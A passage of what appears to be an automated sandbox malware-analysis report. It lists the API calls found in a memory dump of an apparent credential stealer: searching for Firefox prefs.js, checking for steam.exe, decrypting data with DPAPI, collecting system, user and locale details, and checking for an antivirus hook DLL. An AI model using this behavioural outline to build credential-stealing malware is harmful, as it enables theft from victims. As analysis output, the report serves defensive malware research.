Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE

Strings

\*.*, xrefs: 00401E9E

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CreateFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 1116797323-1173974218
Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99

Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

CopyFileA.KERNEL32(?,?,00000001,0043758C,004368AF), ref: 0040D7E8
DeleteFileA.KERNEL32(?), ref: 0040D8B3
FindNextFileA.KERNELBASE(?,?), ref: 0040D956
FindClose.KERNEL32(?), ref: 0040D96A

Strings

prefs.js, xrefs: 0040D702

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99

Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
StrCmpCA.SHLWAPI(?), ref: 0040B780

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A

FindNextFileA.KERNEL32(?,?), ref: 0040B8EB
FindClose.KERNEL32(?), ref: 0040B8FF

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9

Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004124B2
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
Process32First.KERNEL32(00000000,00000128), ref: 004124E4
Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
CloseHandle.KERNEL32(00000000), ref: 00412521

Strings

steam.exe, xrefs: 004124B7, 00412500

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15

Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

LocalFree.KERNEL32(00000000), ref: 00410EFF

Strings

/ , xrefs: 00410E73

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54

Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00412589
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
StrCmpCA.SHLWAPI(?), ref: 004125DC
CloseHandle.KERNEL32(00000000), ref: 004125F0

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25

Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 004080A9

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90

Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Process32Next.KERNEL32(00000000,00000128), ref: 00411542
CloseHandle.KERNEL32(00000000), ref: 0041154D

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 907984538-0
Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69

Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
HeapAlloc.KERNEL32(00000000), ref: 00410D50
GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
wsprintfA.USER32 ref: 00410D7D

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785

Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34

Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00410FD4
wsprintfA.USER32 ref: 00410FEC

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44

Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
